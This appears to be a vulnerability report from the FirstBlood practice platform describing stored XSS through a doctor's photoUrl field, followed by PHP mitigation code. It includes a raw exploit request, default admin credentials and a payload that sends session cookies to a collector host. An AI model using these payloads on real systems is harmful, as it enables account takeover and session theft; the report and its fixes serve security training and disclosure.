FirstBlood-#1456 — Stored XSS on /meet_drs.php can lead to full account takeover
This issue was discovered on FirstBlood v3
On 2022-12-10, 0xblackbird Level 5 reported:
Summary:
Hi mate!
I hope you're doing great today!
I found a stored XSS vulnerability on /meet_drs.php passed on from /drpanel/drapi/edit-dr.php. The doctor's photoUrl parameter is reflected in the source code without being filtered or escaped correctly on /meet_drs.php.
Possible cause:
The developers thought that there was no way to change the path of the profile picture but forgot that invoking the API directly is still an option.
Impact:
I was able to execute JavaScript code on any doctor's behalf. Even more, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully take over the account of the doctor.
Steps to reproduce:
1) Log in using the default credentials: admin:admin
2) Next, replicate the following request:
POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: {HOST}
Cookie: drps={SESS_COOKIE}
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

drid=1&name=xyz&bio=&bookable=0&photoUrl=/'"+onerror="alert(document.domain)
3) Finally, visit /meet_drs.php. A popup should be displayed with the document's domain:
We can elevate our privileges by easily taking over the doctor's account as cookies are not set to be HTTPOnly. To do so, we could put the following payload in the phone parameter to steal and send the cookies back to us:
/"+onerror="location.href=`///{BURP_COLLABORATOR}/collector?cookies=${document.cookie}`"
Next, visit the endpoint again: /meet_drs.php
Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:
Mitigation
I highly recommend encoding any user input and validating it before reflecting it in the response.
Kind regards,
0xblackbird
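As an added illustration of the mitigation recommended above (example code written for this page, not FirstBlood's own source): a PHP sketch of the vulnerable pattern on /meet_drs.php next to a hardened version that validates photoUrl when it is stored by /drpanel/drapi/edit-dr.php and HTML-attribute-encodes it when it is rendered, plus HttpOnly parameters for the session cookie. The function names, the /uploads/ directory, the allowed extensions and the fallback image are assumptions made for the example; the cookie name drps and the payload are taken from the report. The array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example, not FirstBlood's code. Function names, the /uploads/ directory,
// the allowed extensions and the fallback image are assumptions for illustration.

declare(strict_types=1);

// Vulnerable pattern: the stored photoUrl is concatenated straight into the
// src attribute, so a value containing a quote closes the attribute and the
// attacker controls the rest of the <img> tag (e.g. an onerror handler).
function renderPhotoVulnerable(string $photoUrl): string
{
    return '<img src="' . $photoUrl . '" alt="doctor photo">';
}

// Validation at write time (edit-dr.php): accept only a relative path under an
// assumed upload directory, built from a conservative character set and a
// known image extension. Anything else is rejected before it is stored.
function isAllowedPhotoUrl(string $photoUrl): bool
{
    return (bool) preg_match(
        '#\A/uploads/[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif|webp)\z#',
        $photoUrl
    );
}

// Output encoding at read time (meet_drs.php): re-validate the stored value as
// defence in depth, then escape it for an HTML attribute context. ENT_QUOTES is
// essential because the payload in the report uses both ' and ".
function renderPhotoHardened(string $photoUrl, string $fallback = '/uploads/default.png'): string
{
    if (!isAllowedPhotoUrl($photoUrl)) {
        $photoUrl = $fallback;
    }
    $safe = htmlspecialchars($photoUrl, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<img src="' . $safe . '" alt="doctor photo">';
}

// Session cookie flags: HttpOnly keeps document.cookie from reading the drps
// session cookie, so a future XSS cannot exfiltrate it the way the report shows.
// Secure and SameSite are added as good practice (assumed, not from the report).
function sessionCookieParams(): array
{
    return [
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ];
}

// Apply the cookie parameters before session_start() so the drps cookie (or
// PHP's default session cookie) is issued with HttpOnly.
session_set_cookie_params(sessionCookieParams());

// The payload from the report, as stored via the edit-dr.php request.
$payload = '/\'"+onerror="alert(document.domain)';

echo renderPhotoVulnerable($payload), PHP_EOL;
echo renderPhotoHardened($payload), PHP_EOL;
echo renderPhotoHardened('/uploads/dr1.jpg'), PHP_EOL;
```

Run it with `php example.php`. The first line shows the stored value closing the src attribute and injecting an onerror handler, which is the bug the report describes. The second line falls back to the default image because the value fails validation, and the third renders a legitimate path, escaped. Even if validation were skipped, htmlspecialchars() with ENT_QUOTES would turn both quote characters into entities and keep the value inside the attribute; validation is kept as well so that only image paths the application expects are ever stored.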
P2 High
Endpoint: /drpanel/drapi/edit-dr.php
Parameter: photoUrl
Payload: /'"+onerror="alert(document.domain)
FirstBlood ID: 64
Vulnerability Type: Stored XSS
There is a stored XSS vulnerability on meet_drs.php from the photo of the doctor